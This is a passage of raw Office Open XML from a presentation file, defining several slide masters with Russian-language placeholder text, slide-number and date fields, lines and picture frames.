          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="4680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
        <p:nvSpPr>
          <p:cNvPr id="254" name="PlaceHolder 3"/>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Для правки текста заглавия щёлкните мышью</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="255" name="PlaceHolder 4"/>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Для правки структуры щёлкните мышью</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Второй уровень структуры</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Третий уровень структуры</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Четвёртый уровень структуры</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Пятый уровень структуры</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Шестой уровень структуры</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Седьмой уровень структуры</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31" r:id="rId2"/>
  </p:sldLayoutIdLst>
</p:sldMaster>
</file>

<file path=ppt/slideMasters/slideMaster4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6" name="Text Box 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124080" y="6248520"/>
            <a:ext cx="2893320" cy="4550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257" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="85"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553080" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="46800" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
              <a:defRPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:fld id="{1524D6AE-2702-4BE1-B1EB-99C4AFAAA508}" type="slidenum">
              <a:rPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>&lt;номер&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="258" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="86"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="4680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33" r:id="rId2"/>
  </p:sldLayoutIdLst>
</p:sldMaster>
</file>

<file path=ppt/slideMasters/slideMaster4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9" name="Text Box 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124080" y="6248520"/>
            <a:ext cx="2893320" cy="4550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260" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="87"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553080" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="46800" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
              <a:defRPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:fld id="{2A338FE8-C3AE-4256-AC50-2C94E96B6AD0}" type="slidenum">
              <a:rPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>&lt;номер&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="261" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="88"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="4680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35" r:id="rId2"/>
  </p:sldLayoutIdLst>
</p:sldMaster>
</file>

<file path=ppt/slideMasters/slideMaster4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2" name="Text Box 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124080" y="6248520"/>
            <a:ext cx="2893320" cy="455040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>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chemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="263" name="Line 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7596000" y="166680"/>
            <a:ext cx="1440" cy="1245960"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cap="sq" w="12600">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="264" name="Line 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="468000" y="1412640"/>
            <a:ext cx="7128000" cy="1800"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cap="sq" w="12600">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="-43200" bIns="-43200" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="265" name="Picture 8" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7786800" y="214200"/>
            <a:ext cx="1255320" cy="1188360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="266" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="89"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553080" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="46800" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
              <a:defRPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:fld id="{2E19E040-B70F-4A95-865F-D3554FAE5966}" type="slidenum">
              <a:rPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>&lt;номер&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="267" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="90"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="4680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
        <p:nvSpPr>
          <p:cNvPr id="268" name="PlaceHolder 3"/>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Для правки текста заглавия щёлкните мышью</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="269" name="PlaceHolder 4"/>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Для правки структуры щёлкните мышью</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Второй уровень структуры</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Третий уровень структуры</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Четвёртый уровень структуры</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Пятый уровень структуры</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Шестой уровень структуры</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Седьмой уровень структуры</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37" r:id="rId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 name="Text Box 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124080" y="6248520"/>
            <a:ext cx="2893320" cy="4550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32" name="Line 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7596000" y="166680"/>
            <a:ext cx="1440" cy="1245960"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cap="sq" w="12600">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Line 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="468000" y="1412640"/>
            <a:ext cx="7128000" cy="1800"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cap="sq" w="12600">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="-43200" bIns="-43200" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="34" name="Picture 8" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7786800" y="142920"/>
            <a:ext cx="1206000" cy="1283760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="9"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553080" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="46800" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
              <a:defRPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:fld id="{22A465B0-C370-426E-8E48-CE70C21D4BA2}" type="slidenum">
              <a:rPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>&lt;номер&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="4680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7" r:id="rId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 name="Text Box 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124080" y="6248520"/>
            <a:ext cx="2893320" cy="4550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38" name="Line 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7596000" y="166680"/>
            <a:ext cx="1440" cy="1245960"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cap="sq" w="12600">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Line 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="468000" y="1412640"/>
            <a:ext cx="7128000" cy="1800"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cap="sq" w="12600">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="-43200" bIns="-43200" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="40" name="Picture 8" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7786800" y="142920"/>
            <a:ext cx="1206000" cy="1283760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="221040"/>
            <a:ext cx="8228880" cy="124992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Для правки текста заглавия щёлкните мышью</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1604520"/>
            <a:ext cx="4015440" cy="3976920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="0" rIns="0" tIns="0" bIns="0" anchor="t">
            <a:normAutofit fontScale="93333" lnSpcReduction="1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Для правки структуры щёлкните мышью</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Второй уровень структуры</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Третий уровень структуры</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Четвёртый уровень структуры</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Пятый уровень структуры</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Шестой уровень структуры</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Седьмой уровень структуры</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4674240" y="1604520"/>
            <a:ext cx="4015440" cy="3976920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="0" rIns="0" tIns="0" bIns="0" anchor="t">
            <a:normAutofit fontScale="93333" lnSpcReduction="1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Для правки структуры щёлкните мышью</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Второй уровень структуры</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Третий уровень структуры</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Четвёртый уровень структуры</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Пятый уровень структуры</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Шестой уровень структуры</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Седьмой уровень структуры</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553080" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="46800" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
              <a:defRPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:fld id="{E59A78CC-5EA5-4523-AC2A-C2867D105CA7}" type="slidenum">
              <a:rPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>&lt;номер&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="PlaceHolder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="4680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9" r:id="rId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 name="Text Box 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124080" y="6248520"/>
            <a:ext cx="2893320" cy="4550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50" name="Line 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7596000" y="166680"/>
            <a:ext cx="1440" cy="1245960"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
